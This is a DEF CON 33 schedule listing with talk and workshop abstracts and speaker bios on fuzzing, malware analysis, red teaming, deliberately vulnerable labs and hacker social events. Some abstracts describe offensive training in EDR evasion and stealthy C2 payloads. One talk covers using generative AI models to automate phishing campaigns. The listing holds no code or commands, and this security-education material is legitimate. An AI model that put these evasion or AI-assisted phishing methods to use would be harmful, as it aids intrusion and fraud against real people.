Finding vulnerabilities in software requires in-depth knowledge of different technology stacks. Modern day softwares have a huge codebase and may contain vulnerabilities, manually verifying such vulnerabilities is a tedious task and may not be possible in all cases. This training is designed in such a way that it introduces the concept of fuzzing and vulnerability discovery in software’s covering multiple platforms such as Linux & Windows and triage analysis for those vulnerabilities.
Speakers:Zubin Devnani,Dhiraj MishraZubin Devnani is a red teamer by trade, who has identified multiple vulnerabilities in commonly used software. He is a trainer at Blackhat and has delivered multiple workshops, including PHDays and Hacktivity. Utilizes his fuzzing skills in his day to day trade to identify new ways of breaking into enterprises! Blogging at devtty0.io and tweets on @p1ngfl0yd.
SpeakerBio: Dhiraj MishraDhiraj Mishra is an active speaker who has discovered multiple zero-days in modern web browsers and an open-source contributor. He is a trainer at Blackhat, BruCON, 44CON and presented in conferences such as Ekoparty, NorthSec, Hacktivity, PHDays, Hack in Paris & HITB. In his free time, he blogs at www.inputzero.io/www.fuzzing.at and tweets on @RandomDhiraj.
- ics Calendar file
Fuzzing is a technique of identifying software vulnerabilities by automated corpus generation. It has produced immense results and attracted a lot of visibility from security researchers and professionals in the industry, today fuzzing can be utilized in various ways which can be incorporated into your secure SDLC to discover vulnerabilities in advance and fix them. Attendees will be emulating techniques which will provide a comprehensive understanding of "Crash, Detect & Triage" of fuzzed binaries or software. In "Deep dive into fuzzing" we will be covering a detailed overview of fuzzing and how it can be beneficial to professionals in uncovering security vulnerabilities with a hands-on approach through focus on labs.
Finding vulnerabilities in software requires in-depth knowledge of different technology stacks. Modern day softwares have a huge codebase and may contain vulnerabilities, manually verifying such vulnerabilities is a tedious task and may not be possible in all cases. This training is designed in such a way that it introduces the concept of fuzzing and vulnerability discovery in software’s covering multiple platforms such as Linux & Windows and triage analysis for those vulnerabilities.
Speakers:Zubin Devnani,Dhiraj MishraZubin Devnani is a red teamer by trade, who has identified multiple vulnerabilities in commonly used software. He is a trainer at Blackhat and has delivered multiple workshops, including PHDays and Hacktivity. Utilizes his fuzzing skills in his day to day trade to identify new ways of breaking into enterprises! Blogging at devtty0.io and tweets on @p1ngfl0yd.
SpeakerBio: Dhiraj MishraDhiraj Mishra is an active speaker who has discovered multiple zero-days in modern web browsers and an open-source contributor. He is a trainer at Blackhat, BruCON, 44CON and presented in conferences such as Ekoparty, NorthSec, Hacktivity, PHDays, Hack in Paris & HITB. In his free time, he blogs at www.inputzero.io/www.fuzzing.at and tweets on @RandomDhiraj.
- ics Calendar file
In this hands-on workshop you’ll move beyond the theory of network fingerprinting and actually use them in practice at both the TCP and TLS layers. Working in live lab environments, you will:
muonfp, p0f, ja3, ja3n and ja4Vlad is the co-founder and cybersecurity expert at ELLIO and President of the Anti-Malware Testing Standards Organization (AMTSO).A true cybersecurity enthusiast, Vlad’s passionate about network security, IoT, and cyber deception. Before ELLIO, he founded and led the Avast IoT Lab (now Gen Digital), developing security features and researching IoT threats. He has spoken at many conferences, including Web Summit and South by Southwest (SXSW), where he demonstrated IoT vulnerabilities.
- ics Calendar file
Performing analysis of fake images and videos can be challenging considering the plethora of techniques that can be used to create a deepfake. In this session, we'll explore methods for identifying fake images and videos whether created by AI, photoshopped, or GAN-generated media. We'll then use this for the basis of a live demonstration walking through methods of exposing signs of alteration or AI generation using more than a dozen techniques to expose these forgeries. We'll also highlight a free GPT tool for performing your own analysis. Finally, we'll provide additional resources and thoughts for the future of deepfake detection.
SpeakerBio: Mike Raggo, Security Researcher at SilentSignalsMichael T. Raggo has over 30 years of security research experience. During this time, he has uncovered and ethically disclosed vulnerabilities in products including Samsung, Checkpoint, and Netgear. Michael is the author of “Mobile Data Loss: Threats & Countermeasures” and “Data Hiding” for Syngress Book. He is also a frequent presenter at security conferences, including Black Hat, DEF CON, Gartner, RSA, DoD Cyber Crime, OWASP, SANS. He was also awarded the Pentagon’s Certificate of Appreciation.
- ics Calendar file
Held every year since DEF CON 19 in 2011 (R.I.P. Riviera), (Except during that COVID thing - but we are not going to talk about that COVID thing), the DEF CON (unofficial) Beard and Mustache Contest highlights the intersection of facial hair and hacker culture.
For 2025 there will be four categories for the competition you may only enter one:
Full beard: Self-explanatory, for the truly bearded.
Partial Beard: For those sporting Van Dykes, Goatees, Mutton Chops, and other partial beard styles.
Mustache only: Judging on the mustache only, even if bearded. Bring your Handlebars, Fu Manchus, or whatever adorns your upper lip.
Freestyle: Anything goes, including fake and creatively adorned beards. Creative women often do well in the Freestyle category.
Real or Fake facial hair as described above.
no
- ics Calendar file
Explores how DCGs extend the DEF CON ethos year-round. Shares practical stories of how local group POCs foster community. Encourages attendees to connect with their local group or form their own group in the absence of a DCG.
Speakers:Adam915,Jayson E Street,Alethe DenisDEF CON Groups Global Coordinator
SpeakerBio: Jayson E Street, DCG DeptDEF CON Groups Global Ambassador
SpeakerBio: Alethe Denis, DCG DeptDEF CON Groups Dept 2nd Lead
- ics Calendar file
Defcon.run is a beloved tradition at DEF CON, bringing together hackers for a refreshing start to the day. Originally known as the DEF CON 4x5K, the event has evolved into a distributed, community-driven experience featuring fun runs and rucks across Las Vegas. Participants can choose from various routes, ranging from simple 5Ks to more ambitious distances.
For DEF CON 33, the gathering point is "The Spot" by the North Entrance of the Las Vegas Convention Center West Hall. Here, the real wild hares gather before the sun has a chance to burn up this city of sin. The runs kick off at 06:00 Thursday through Sunday! But be there early for hype talks and shenanigans. We also have a whole new Meshtastic setup and website features we're adding. There are other runs swag drops and social meetups planned throughout the day and night as well!
Whether you're a seasoned runner or looking for something different, defcon.run offers a unique way to connect with other hackers and kick off your day. For more details and to sign up, visit defcon.run.
- ics Calendar file
This workshop is designed to give students the skills they need to identify and defeat common evasion techniques used by malware. It’s broken up into three hands-on modules where students will work with a range of open-source (or otherwise free) tools to dig into malicious code, examine different evasion techniques, and learn how to circumvent them to better understand how the malware operates. We’ll be using a mix of instructor-created malware samples—with full source code provided so students can analyze both the binary and the code side-by-side—and real-world samples found in the wild. By the end of the workshop, students will walk away with several malware samples, pages of code to keep digging into on their own, and a solid toolkit of techniques for breaking through typical anti-analysis and evasion tricks used in modern malware.
Speakers:Kyle "d4rksystem" Cucci,Randy PargmanKyle Cucci is a malware analyst and detection engineer with Proofpoint’s Threat Research team. Previously, he led the forensic investigations and malware research teams at a large global bank. Kyle is the author of the book "Evasive Malware: A Field Guide to Detecting, Analyzing, and Defeating Advanced Threats" and is a regular speaker at conferences, speaking on topics like malware analysis, offensive security, and security engineering. In his free time, Kyle enjoys contributing to the community via open source tooling, research, and blogging.
SpeakerBio: Randy Pargman, Director, Threat Detection @ ProofpointRandy leads threat detection and engineering teams at Proofpoint, using custom dynamic sandbox systems to detect evasive malware and phishing threats that target customers around the world. He previously led threat hunting and endpoint detection engineering at Binary Defense, and investigated botnets and other cyber criminal activities as a member of the FBI Cyber Action Team and Seattle Cyber Task Force. Randy currently volunteers as a digital forensic analyst with The DFIR Report, and organizes DEATHCon, a global conference for Detection Engineering and Threat Hunting workshops.
- ics Calendar file
This session will introduce the strategy of designing and deploying deception strategies across ICS environments, by leveraging and operationalizing the Mitre Engage adversarial framework. This presentation will discuss the complexities related to deploying deception within ICS environments, and how to design a deception strategy geared towards the adversaries targeting your environment. A real-world case study, focusing on APT44, will demonstrate how to implement a deception strategy for Critical Infrastructure organisations.
SpeakerBio: Brent Muir, GoogleBrent has over 18 years experience working in the cybersecurity industry. He spent 12 years working in the Australian government sector, including Law Enforcement agencies, leading national cyber teams. Following his government work, Brent led the global digital forensics and incident response team for a Fortune 500 bank. His expertise has led him to working directly with C-Suite and Crisis Management teams, handling large-scale cyber incidents, including APT-linked cyber espionage campaigns. In addition to government and financial sectors, Brent has extensive experience working in Operational Technology industries, including telecommunications and energy providers.
- ics Calendar file
Learn how to build a state-of-the-art quantum sensor, no physics PhD necessary!
Quantum Technology may sound like a faraway ultra-neon cyber fever dream, and in the case of quantum computing it may be some time before we’re swapping QPUs on our laptops… But Quantum Sensing is here, and we felt the time was about right to break open this technology for all.
We designed and are releasing the first ever fully open source, hackable quantum sensor. Utilising common off the shelf parts, and a sample of Nitrogen-Vacancy Centre Diamond, we will be able to measure magnetic fields with light. We will show you how to build your own device, what tech is required, and how to get a signal from the diamond. We’ll discuss some of the use cases of these sensors, from medtech to defeating GPS jamming. Then we’ll show you how to hack with it, taking the first steps to using these sensors to infer the behaviour of a chip via magnetometry. #QuantumHackers
This talk is the main demonstration of this year’s Quantum Village Badge - an actual quantum sensor released for the International Year of Quantum. Whilst others will make you think that you need advanced degrees and an expensive lab, we’ll be building quantum sensors in our garages and pushing the limits of this brand new technology; Access All Atoms!
References:
Mark is a mathematician and Quantum Hacker. Working at the bleeding edge of technology for two decades, he- a has presented on an array of topics stemming from his work on quantum information, machine learning, cryptography and cybersecurity data science. He has presented at major conferences around the world and his work was recently nominated for Innovation of the Year at the SANS Difference Makers Awards. Mark co-founded Quantum Village.
SpeakerBio: Victoria "V__Wave" KumaranVictoria has been hacking her way through tech over the years, making her first software tool aged 8. Victoria has a background in product design, has paid her dues in finance, has run startups using machine learning for cybersecurity & malware analysis and was an Entrepreneurial Lead on the NSF I-Corps Program. She studied art and design at Central Saint Martins and co-founded Quantum Village.
- ics Calendar file
"Hospitals and trauma centers face critical delays in triage, patient monitoring, and shift handoffs—leading to avoidable medical errors, increased wait times, and compromised patient safety. What if AI-powered triage, biometrics, and AI-driven simulation labs could change that? This talk explores how biometric AI, smart bedside displays, digital handoff systems, and AI physiology simulations can enhance emergency care, reduce human error, and revolutionize medical training. Key Innovations We’ll Unpack: 1. AI-Facial Recognition: Upon entry to the hospital/facility, AI-powered sensors take a real-time picture of each patient as they walk/check into the ED and sync the biometric picture with their Medical Record Number (MRN) patient chart. 2. AI-Powered Biometric Triage: AI sensors continue to scan patients in the waiting room, analyzing vital signs (HR, respiratory rate, O2 sat, temp), non-verbal distress like bleeding (trauma), pain based on facial droop (Stroke), chest pain or shortness of breath (Heart Attack), syncope, labor/delivery, and grimacing (pain), and factor all these into the Emergency Severity Index (ESI) algorithm for a real-time comprehensive display to triage staff for their review. 3. Digital Handoff Reporting: Automated shift changes summaries ensure that critical patient data like medical and surgical history, labs, vital trends, pending orders, isolation precautions, and risk factors are not lost between clinicians. It also reduces paper waste, redundancy, and inefficiencies like report duration. 4. Digital Smart Room Display (i.e. TV): Like at a nice hotel room, your patient room tv would provide you with a personalized channel with your real-time medical updates (aka tv medical chart), that are approved by your providers, that are synced to your EHR chart and secured with a personalized pin you created during registration. Upon discharge of the hospital, your channel would be deactivated. This would enhance the time from provider-to-patient communication, decrease patient wait times for results, and ensure healthcare treatment transparency. It is optional and on-demand for the patient and family if consent is given by the patient. 5. AI Physiology in Simulation Labs: AI-driven simulated patient models that replicate real-time human physiology, responses to trauma, medication interactions, and disease progression—transforming medical education. 6. Cybersecurity in AI-Driven Emergency Care: Protecting biometric patient data, preventing AI hallucinations and poisoning, and securing AI-driven training systems. By integrating AI-driven biometrics, automating bedside displays and handoff reports, and AI physiology in healthcare, we can prioritize critical patients faster, reduce handoff errors, and accelerate healthcare education. The future of emergency care isn’t just faster, it’s predictive, automated, and cybersecure.
SpeakerBio: Jennifer Schieferle UhlenbrockDr. Jennifer Schieferle Uhlenbrock has 20+ years of healthcare experience. She bridges clinical practice, business, and cybersecurity best practices. A published technical writer and speaker, she translates complex security and patient safety challenges into clear, actionable insights.
- ics Calendar file
DMA vulnerabilities aren't new - but they don't seem to have gone anywhere. In the time software attacks have gone from a single bug to a multi-stage exploit chain, DMA attacks have gone from slipping some hardware into an internal slot of a computer to... plugging in an external device?
Despite decades of attacks, tooling, and even mitigations, most systems are still wide open to these attacks because of their perceived difficulty, poor system configuration, and lack of effective testing mechanisms.
Epic Erebus is a new tool that tries to address these issues. It's small, portable, and easy to use. It can slip through most systems unless the hardware, bios, and operating system are properly configured (a rarity). Finally, it's an entirely open PCIe implementation that gives you full control over Transaction Layer Packets - allowing you to reverse engineer the PCIe Bus and the DMA mitigations in place (Get it? RE-Bus... Erebus!)
You should come away understanding what erebus is capable of, the basics of how to use it, and what to look out for when properly implementing DMA attack mitigations.
References:
Joe FitzPatrick (@securelyfitz) is a Trainer and Researcher at SecuringHardware.com (@securinghw). Joe has spent most of his career working on low-level silicon debug, security validation, and penetration testing of CPUs, SoCs, and microcontrollers. He has spent decades developing and delivering hardware security related tools and training, instructing hundreds of security researchers, pen testers, and hardware validators worldwide. When not teaching Applied Physical Attacks training, Joe is busy developing new course content or working on contributions to the NSA Playset and other misdirected hardware projects, which he regularly presents at all sorts of fun conferences.
SpeakerBio: Grace "Baelfire" ParrishGrace Parrish (@BaelfireNightshd@infosec.exchange) is in her final year of a cybersecurity degree at Oregon State University. Grace has spent much of her career working with industrial control systems but has also dabbled in electrical engineering, FPGAs, microcontrollers, and a quick decade as a board level repair technician. In her spare time as a student, she has served as the team captain for a pentesting competition, has written custom Binary Ninja plugins, and has helped deliver hardware security training at Black Hat. Grace is looking forward to working in the offensive security space once she completes her degree.
- ics Calendar file
As a London-based security researcher with a strong focus on open-source intelligence (OSINT) and attack surface discovery, I am excited to attend the DEF CON conference for the first time and contribute meaningfully to the Red Team Village. My passion lies in developing and refining reconnaissance techniques that enable both offensive and defensive practitioners to gain deeper insights into an organization’s digital footprint.
During the RTV Tactics sessions, I will present a DNS-based OSINT methodology for uncovering products and services through large-scale DNS TXT record scanning. This previously unpublished approach demonstrates how certain TXT records can reveal not just domain ownership or validation details, but also the presence of specific third-party services and platforms in use. For instance, TXT entries like google-site-verification, MS=msXXXXXXXX, or vendor-specific SPF includes can expose dependencies on Google Workspace, Microsoft 365, or other cloud-based services.
By programmatically analyzing these records across large swaths of DNS zones, attackers can construct detailed maps of an organization's technology stack and supply chain affiliations—critical intelligence for targeted campaigns. This intelligence also provides defenders with an opportunity to detect inadvertent information leakage and improve control over external DNS configurations.
To support operational use, I have integrated this scanning technique into widely adopted open-source tools such as Nuclei and Amass. These enhancements allow red teams and security researchers to efficiently incorporate TXT record reconnaissance into broader discovery workflows, elevating the precision and depth of traditional enumeration phases.
This session will equip attendees with practical, reproducible tactics for passive and semi-active discovery that can uncover non-obvious attack vectors. Attendees will leave with actionable insights and tooling that can be immediately applied to real-world engagements.
It would be an absolute honor to support the Red Team Village and give back to a community that has been instrumental in shaping my growth as a researcher. I deeply value the Village’s mission to educate, inspire, and empower red teamers of all experience levels, and I am eager to contribute to that mission by sharing knowledge that enhances our collective offensive capabilities and understanding of adversarial tradecraft. Thank you for the opportunity to be considered.
SpeakerBio: Rishi "rxerium" ChudasamaRishi Chudasama is a London-based security researcher with over five years of hands-on experience in IT. He currently specializes in vulnerability research, threat intelligence, and enterprise risk analysis. His current focus lies in identifying and analyzing zero-day vulnerabilities and emerging CVEs, often working to reverse engineer exploit mechanics and build detection logic before public weaponization. Rishi’s work spans both offensive and defensive domains—developing threat models based on real-world TTPs, crafting custom detection rules, and automating reconnaissance pipelines to uncover exploitable misconfigurations and exposed assets. He is particularly active in attack surface management (ASM) and OSINT, where he leverages DNS enumeration, passive data correlation, and large-scale infrastructure scanning to surface unknown entry points and map adversary-accessible exposure. Outside of research, Rishi integrates findings into operational tooling and supports data-driven prioritization strategies to bridge technical risk and business impact. His work reflects a deep commitment to adversary-informed defense and proactive discovery across modern hybrid environments.
- ics Calendar file
Effective phishing campaigns traditionally demand extensive manual effort, involving detailed target reconnaissance, crafting believable scenarios, and setting up infrastructure. These manual processes significantly restrict scalability and customization. This talk explores a practical approach to leveraging Generative AI for automating core aspects of phishing workflows, drawing on direct experiences and real-world threat actors such as Emerald Sleet, Crimson Sandstorm, and Charcoal Typhoon.
The session thoroughly compares results from different models and platforms, including OpenAI ChatGPT, Anthropic Claude, and local alternatives, highlighting distinct strengths, weaknesses, and techniques for optimizing outcomes. Attendees will gain insights into deploying an end-to-end phishing campaign, emphasizing the models' effectiveness in reducing the technical barrier of scaling phishing attacks. Finally, the talk underscores that while AI significantly enhances operational efficiency, it functions best when complemented by human judgment and expertise, reinforcing the critical human factor in cybersecurity practices.
SpeakerBio: Daniel MarquesWith over 15 years in offensive security, Daniel applies a strong software development and networking background to help Fortune 500 companies identify and remediate vulnerabilities in various technologies, including corporate networks, applications, and smart devices. With more than 15 years of experience in Cybersecurity, prominent local and international security conferences such as HOU.SEC.CON, ISC2 Security Congress, and Black Hat Regional Summit featured his Offensive Security research. Daniel holds a B.Sc. in Computer Science and an M.Sc. in Cybersecurity. In 2019, Daniel was part of the team that won the DEF CON Biohacking Village Capture the Flag competition.
- ics Calendar file
"Dodging the EDR bullet" Training is an intensive, hands-on course designed to equip cybersecurity professionals with cutting-edge skills in malware evasion techniques. Dive deep into Windows security components, antivirus systems, and EDRs while mastering the full malware lifecycle—from initial access to advanced in-memory evasion and kernel-level persistence. Through a systematic approach to memory management and process manipulation, participants will learn how to bypass modern detection strategies and build stealthy malware components. The course focuses on cultivating a research-driven mindset, enabling attendees to understand and analyze detection strategies provided by the Windows OS and then craft their own techniques to evade them.
By the end of the training, participants will have gained a solid foundation in malware analysis and development, enabling them to craft sophisticated command-and-control (C2) payloads and maintain persistence while remaining undetected.
* All students are expected to sign an NDA with the trainer to avoid unauthorized sharing of training materials *
Speakers:Giorgio "gbyolo" Bernardinetti,Dimitri "GlenX" Di CristofaroGiorgio "gbyolo" Bernardinetti is lead researcher at the System Security division of CNIT. His research activities are geared towards Red Teaming support activities, in particular design and development of advanced evasion techniques in strictly monitored environments, with emphasis on (but not limited to) the Windows OS, both in user-space and kernel-space. He has been a speaker for DEFCON32 Workshops and Red Team Village HacktivityCon 2021.
SpeakerBio: Dimitri "GlenX" Di Cristofaro, Security Consultant and Researcher at SECFORCE LTDDimitri "GlenX" Di Cristofaro is a security consultant and researcher at SECFORCE LTD where he performs Red Teams on a daily basis. The main focus of his research activities is about Red Teaming and in particular on identifying new ways of attacking operating systems and looking for cutting edge techniques to increase stealthiness in strictly monitored environments. He enjoys malware writing and offensive tools development as well as producing electronic music in his free time.
- ics Calendar file
"Dodging the EDR bullet" Training is an intensive, hands-on course designed to equip cybersecurity professionals with cutting-edge skills in malware evasion techniques. Dive deep into Windows security components, antivirus systems, and EDRs while mastering the full malware lifecycle—from initial access to advanced in-memory evasion and kernel-level persistence. Through a systematic approach to memory management and process manipulation, participants will learn how to bypass modern detection strategies and build stealthy malware components. The course focuses on cultivating a research-driven mindset, enabling attendees to understand and analyze detection strategies provided by the Windows OS and then craft their own techniques to evade them.
By the end of the training, participants will have gained a solid foundation in malware analysis and development, enabling them to craft sophisticated command-and-control (C2) payloads and maintain persistence while remaining undetected.
* All students are expected to sign an NDA with the trainer to avoid unauthorized sharing of training materials *
Speakers:Giorgio "gbyolo" Bernardinetti,Dimitri "GlenX" Di CristofaroGiorgio "gbyolo" Bernardinetti is lead researcher at the System Security division of CNIT. His research activities are geared towards Red Teaming support activities, in particular design and development of advanced evasion techniques in strictly monitored environments, with emphasis on (but not limited to) the Windows OS, both in user-space and kernel-space. He has been a speaker for DEFCON32 Workshops and Red Team Village HacktivityCon 2021.
SpeakerBio: Dimitri "GlenX" Di Cristofaro, Security Consultant and Researcher at SECFORCE LTDDimitri "GlenX" Di Cristofaro is a security consultant and researcher at SECFORCE LTD where he performs Red Teams on a daily basis. The main focus of his research activities is about Red Teaming and in particular on identifying new ways of attacking operating systems and looking for cutting edge techniques to increase stealthiness in strictly monitored environments. He enjoys malware writing and offensive tools development as well as producing electronic music in his free time.
- ics Calendar file
This workshop will provide participants with the necessary knowledge to plan and execute red team exercises that accurately emulate real-world threat actors. Using MITRE ATT&CK as a foundation, attendees will learn how to map adversary tactics, techniques, and procedures (TTPs) to red team operations, ensuring realism down to the indicator of compromise (IOC) level. The workshop culminates with the hands-on development of a red team campaign to emulate an advanced persistent threat (APT) group. For this exercise, participants will receive simulated exercise objectives and rules of engagement and will use presented techniques to develop a basic red team campaign plan for successfully emulating the selected threat group.
SpeakerBio: William GilesWilliam (Billy) Giles is an Offensive Security leader and practitioner who specializes in red/purple teaming, adversary emulation, and network penetration testing. With a deep passion for understanding and simulating adversary behaviors, he helps organizations across a multitude of industries assess their security postures, identify and remediate vulnerabilities, and build stronger defenses by thinking like an attacker.
- ics Calendar file
In the continuously evolving world of browser extensions, security remains a big concern. As the demand of feature-rich extensions increases, priority is given to functionality over robustness, which makes way for vulnerabilities that can be exploited by malicious actors. The danger increases even more for organizations handling sensitive data like banking details, PII, confidential org reports, etc. Damn Vulnerable Browser Extension (DVBE) is an open-source vulnerable browser extension, designed to shed light on the importance of writing secure browser extensions and to educate developers and security professionals about the vulnerabilities and misconfigurations that are found in browser extensions, how they are found, and how they impact business. This built-to-be-vulnerable extension can be used to learn, train, and exploit browser extension-related vulnerabilities.
SpeakerBio: Abhinav KhannaAbhinav is an information security professional with 6+ years of experience. Having worked at organisations like S&P Global and NotSoSecure, his area of expertise lies in web appsec, mobile appsec, API security, and browser extension security. He has spoken at multiple conferences like Black Hat Asia, Black Hat Europe, and Black Hat MEA. In his free time, he likes playing table tennis.
- ics Calendar file
Dyna is a full-spectrum Android security auditing framework designed to automate the OWASP MASTG checklist using both static and dynamic analysis. Built for red teams, appsec engineers, and mobile researchers, Dyna combines Frida, Drozer, PyGhidra, and ADB-based techniques into a modular pipeline that evaluates app permissions, exported components, crypto misuse, insecure storage, IPC abuse, native binary risks, and reverse engineering resilience. It can detect traversal, SQLi, hardcoded secrets, and debuggable builds, while reverse engineering .so files using Ghidra in headless mode. Dyna also features real-time logcat parsing and deep link/URL extraction to trace third-party leaks and misconfigurations. With colored output, structured reports, and an extensible architecture, Dyna turns OWASP MASTG from a checklist into a powerful automated testing workflow.
Speakers:Arjun "T3R4_KAAL" Chaudhary,Ayodele IbidapoArjun is a dedicated and certified cybersecurity professional with extensive experience in web security research, vulnerability assessment and penetration testing (VAPT), and bug bounty programs. His background includes leading VAPT initiatives, conducting comprehensive security risk assessments, and providing remediation guidance to improve the security posture of various organizations. With a Master's degree in Cybersecurity and hands-on experience with tools such as Burp Suite, Wireshark, and Nmap, he brings a thorough understanding of application, infrastructure, and cloud security. As a proactive and self-motivated individual, he is committed to staying at the forefront of cybersecurity advancements. He has developed specialized tools for exploiting and mitigating vulnerabilities and collaborated with cross-functional teams to implement effective security controls. His passion for cybersecurity drives him to continuously learn and adapt to emerging threats and technologies. He is enthusiastic about contributing to innovative security solutions and engaging with the broader security community to address complex cyber threats. He believes that the future of cybersecurity lies in our ability to innovate and adapt, and he is dedicated to making a meaningful impact in this field.
SpeakerBio: Ayodele IbidapoAyodele is a cybersecurity consultant and application penetration tester with over 15 years of experience strengthening enterprise security architecture, risk governance, and secure DevSecOps practices across finance, telecom, and manufacturing sectors. His expertise spans mobile, web, and containerized applications, where he developed taint flow analyzers, automated vulnerability discovery workflows, and built custom static and dynamic analysis tools to uncover complex security flaws. He holds a Master’s in Information Systems Security Management from Concordia University of Edmonton and a B.Eng. from the University of Portsmouth. His research on CVSS v2 environmental scoring was presented at IEEE’s international conference at MIT, and he continues to bridge deep technical testing with strategic design to deliver resilient, risk-informed solutions.
- ics Calendar file
EFF's team of technology experts have crafted challenging trivia about the fascinating, obscure, and trivial aspects of digital security, online rights, and Internet culture. Competing teams will plumb the unfathomable depths of their knowledge, but only the champion hive mind will claim the First Place Tech Trivia Badge and EFF swag pack. The second and third place teams will also win great EFF gear.
No prerequisites! Just a desire to have fun and come answer some trivia questions. Participants will need to join a team which they can create beforehand or join one ad-hoc during the event!
None
- ics Calendar file
Traditional patching has failed to scale - it’s time for a new approach. This hands-on workshop teaches you to eliminate entire bug classes with modern browser security features instead of endlessly reacting to reports. Instead of firefighting the same issues, you’ll learn how Content-Security-Policy v3, Trusted Types, and Sec-Fetch-Metadata go beyond traditional OWASP recommendations to prevent vulnerabilities at scale.
You’ll work with a training app that’s already secured, but we’ll go further. By applying advanced browser defenses, testing effectiveness, and enforcing security at scale, you’ll experience firsthand how modern web standards protect both new and legacy systems.
This isn’t just about fixing issues - it’s about scaling security across an organization. We’ll explore measuring adoption across hundreds of services, automating enforcement, and applying defense-in-depth beyond single vulnerabilities.
Through interactive group challenges, you’ll tackle real-world vulnerabilities, enforce modern safeguards, and transform how you approach web security. Whether you’re a developer, security engineer, or architect, you’ll leave with practical tools and a proactive security mindset - moving from patching to prevention.
SpeakerBio: Javan Rasokat, Application Security Architect and Security ResearcherJavan is a Senior Application Security Specialist at Sage, helping product teams enhance security throughout the software development lifecycle. On the side, he lectures Secure Coding at DHBW University in Germany. His journey as an ethical hacker began young, where he began to automate online games using bots and identified security bugs, which he then reported to the game operators. Javan made his interests into his profession and began as a full stack web and mobile engineer before transitioning into a passionate security consultant. Javan holds a Master’s degree in IT Security Management and several certifications, including GXPN, AIGP, CISSP, CCSP, and CSSLP. He has shared his research at conferences, including OWASP Global AppSec, DEFCON, and HITB.
- ics Calendar file
Empire 6.0 is the latest evolution of the Command and Control (C2) framework. This major release introduces powerful new capabilities, including Go-based agents for enhanced cross-platform compatibility, a completely overhauled Empire compiler for streamlined payload deployment, and an integrated plugin marketplace in Starkiller. Enhanced module systems, dynamic option handling, Beacon Object File integration, and advanced remote script execution further expand Empire's capabilities. Empire continues to provide cryptographically secure communications and direct integration with the MITRE ATT&CK framework to emulate real-world Advanced Persistent Threat tactics, techniques, and procedures. This demo lab will highlight these significant advancements and demonstrate Empire 6.0's state-of-the-art capabilities.
Speakers:Vincent "Vinnybod" Rose,Jake "Hubble" KrasnovVincent "Vinnybod" Rose is the Lead Developer for Empire and Starkiller. He is a software engineer with a decade of expertise in building highly scalable cloud services, improving developer operations, and automation. Recently, his focus has been on the reliability and stability of the Empire C2 server. Vinnybod has presented at Black Hat and has taught courses at DEF CON on Red Teaming and Offensive PowerShell. He currently maintains a cybersecurity blog focused on offensive security at https://www.bc-security.org/blog/.
SpeakerBio: Jake "Hubble" Krasnov, Red Team Operations Lead and Chief Executive Officer at BC SecurityJake "Hubble" Krasnov is the Red Team Operations Lead and Chief Executive Officer of BC Security, with a distinguished career spanning engineering and cybersecurity. A U.S. Air Force veteran, Jake began his career as an Astronautical Engineer, overseeing rocket modifications, leading test and evaluation efforts for the F-22, and conducting red team operations with the 57th Information Aggressors. He later served as a Senior Manager at Boeing Phantom Works, where he focused on aviation and space defense projects. A seasoned speaker and trainer, Jake has presented at conferences including DEF CON, Black Hat, HackRedCon, HackSpaceCon, and HackMiami.
- ics Calendar file
- ics Calendar file
EntraGoat is a deliberately vulnerable environment designed to simulate real-world security misconfigurations and attack scenarios in Microsoft Entra ID (formerly Azure Active Directory). Security professionals, researchers, and red teamers can leverage EntraGoat to gain hands-on experience identifying and exploiting identity and access management vulnerabilities, privilege escalation paths, and other security flaws specific to cloud-based Entra ID environments. EntraGoat is tailored specifically to help security practitioners understand and mitigate the risks associated with cloud identity infrastructures. The project provides a CTF-style learning experience, covering a range of misconfigurations, insecure policies, token abuses, and attack paths commonly exploited in real-world Entra ID breaches. By using EntraGoat, security teams can enhance their skills in Entra ID security, validate detection and response capabilities, and develop effective hardening strategies.
Speakers:Tomer Nahum,Jonathan ElkabasTomer is a security researcher at Semperis, where he works to find new attacks and how to defend against them in on-prem identity stacks such as Active Directory, as well as cloud identity systems. He was awarded Most Valuable Researcher (MVR) in 2023 by Microsoft Security Response Center (MSRC).
SpeakerBio: Jonathan ElkabasJonathan is a security researcher at Semperis, specializing in Entra ID and Active Directory security. With expertise in identity-based threats, he focuses on analyzing attack techniques, developing detection strategies, and enhancing defenses against evolving cyber threats. He actively contributes to the security community through research, threat intelligence sharing, and speaking engagements.
- ics Calendar file
- ics Calendar file
Feet Feud (Hacker Family Feud) is a Cybersecurity-themed Family Feud style game arranged by members of the OnlyFeet CTF team and hosted by Toeb3rius (aka Tib3rius). Both survey questions and their answers are crowd-sourced from the Cybersecurity community. Two teams (Left Foot and Right Foot) captained by Ali Diamond and John Hammond and comprised of audience members go head to head, trying to figure out the top answers to the survey questions.
Attendees can either watch the game or volunteer to play on one of the two teams. Audience participation is also encouraged if either of the two teams fails to get every answer of a survey question.
Ultimately Feet Feud is about having a laugh, watching people in the industry attempt to figure out what randomly surveyed people from the Cybersecurity community put as answers to a number of security / tech related questions.
Participants are chosen by team captains from the audience at the start of the show. In order to be fair, we try to select participants from all seating areas, so folks who show up later than others still have a chance to volunteer.
None.
- ics Calendar file
Maritime vessel controls and operational technology (OT) systems are getting more complex and interconnected. With industry trends aiming to reduce crew, automate tasks, and improve efficiency, these networks are expanding in scale, intricacy, and criticality for vessel operation and maintenance. The standard controller area network (CAN) bus for maritime vessel networks, developed by the National Marine Electronics Association (NMEA), known as NMEA2000. NMEA2000 is an application layer network protocol built on the ISO11783 standard and compatible with automotive SAEJ1939, it uses unique message identifiers known as Parameter Group Number, to define the data within each communication frame. Despite its widespread use, NMEA2000 remains a relatively unexplored domain, particularly in understanding normal versus abnormal network behavior, due to the unavailability of open-source datasets. To address this gap, we constructed a NMEA2000 system consisting of five nodes: GPS/Radar, Wind Speed/Direction sensor, and Multifunction Display. Using this setup, we collected datasets to analyze system behavior and developed deterministic fingerprints for each sensor, establishing a baseline of the normal operating system. We subject the system to controlled attacks to evaluate the accuracy and effectiveness of the fingerprints. This work represents a foundational step towards enhancing security and reliability in maritime OT systems.
Speakers:Constantine Macris (TheDini),Anissa EliasConstantine Macris is a Connecticut native and pursuing a PhD at the URI. Constantine is a reserve CDR in the Navy, industry expert in OT and network security and CISO at Dispel.
SpeakerBio: Anissa Elias, University of Rhode Island
- ics Calendar file
